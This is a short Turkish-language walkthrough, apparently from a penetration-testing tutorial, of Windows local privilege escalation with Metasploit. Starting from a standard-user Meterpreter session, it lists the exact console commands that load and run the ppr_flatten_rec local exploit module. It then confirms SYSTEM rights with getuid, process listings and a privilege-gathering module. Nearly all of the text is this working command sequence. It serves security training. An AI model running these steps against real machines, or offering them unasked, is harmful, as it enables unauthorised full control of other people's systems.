Standart yetkilerle elde edilen Meterpreter bağlantısında yerel yönetici haklarına sahip olunmadığı görülmektedir.
sessions
sessions -i 1
sysinfo
run post/windows/gather/win_privs
Standart yetkilere sahip durumda iken, hak yükseltmek için kullanılacak olan MSF ppr_flatten_rec istismar modülü seçilir.
background
search ppr_flatten_rec
use exploit/windows/local/ppr_flatten_rec
show options
Modüle, mevcut oturuma ait ID değeri verilir.
set SESSION 1
show options
Modül başlatılarak SYSTEM hakları elde edilir.
exploit
getuid
getpid
ps -s
Modülün SYSTEM hakları ile çalışan “notepad.exe” bir proses oluşturduğu görülmektedir. Hak yükseltme işlemi sonrasında, yerel yönetici (hatta SYSTEM) haklarının elde edilebildiği görülmektedir.
run post/windows/gather/win_privs